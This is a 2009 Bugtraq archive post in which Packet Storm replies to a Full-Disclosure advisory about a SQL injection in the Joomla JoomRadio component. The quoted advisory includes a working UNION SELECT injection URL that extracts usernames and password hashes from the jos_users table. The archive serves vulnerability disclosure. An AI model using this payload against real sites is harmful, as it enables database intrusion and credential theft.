Bugtraq mailing list archives
Re: [Full-disclosure] Joomla Component com_joomradio SQL Injection
From: Packet Storm <packet () packetstormsecurity org>
Date: Wed, 18 Feb 2009 17:21:10 -0500
Already discovered in June, 2008. http://packetstormsecurity.org/0806-exploits/joomlajoomradio-sql.txt bc9c589fca40fce9a4f4484333f207b5 The Joomla Joomradio component version 1.0 suffers from a remote SQL injection vulnerability. Authored By <a href="mailto:His0k4.hlm[at]gmail.com">His0k4</a> On Wed, Feb 18, 2009 at 07:32:02PM +0100, 0o_zeus_o0 wrote:
########################################################################### # Advisory X # Title: Joomla Component com_joomradio SQL Injection # Author: 0o_zeus_o0 ( Arturo Z. ) # Contact: arturo_zamora_c () hotmail com # Website: www.securitybroken.com # Date: 18/02/09 # Risk: Medium # Vendor Url: http://ajaxportal.eu/ # Affected Software: JoomRadio # autor script:author XrByte <info () exp ee>, Grusha <grusha () feellove eu> ################################################################## # #Example: ################################################################## #htp:// victimurl.com/pathjoomla/index.php?option=com_joomradio&page=show_radio&id=-1UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users-- # ################################################################## #greetz: # # original advisorie: http://www.securitybroken.com ##################################################################
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: [Full-disclosure] Joomla Component com_joomradio SQL Injection Packet Storm (Feb 18)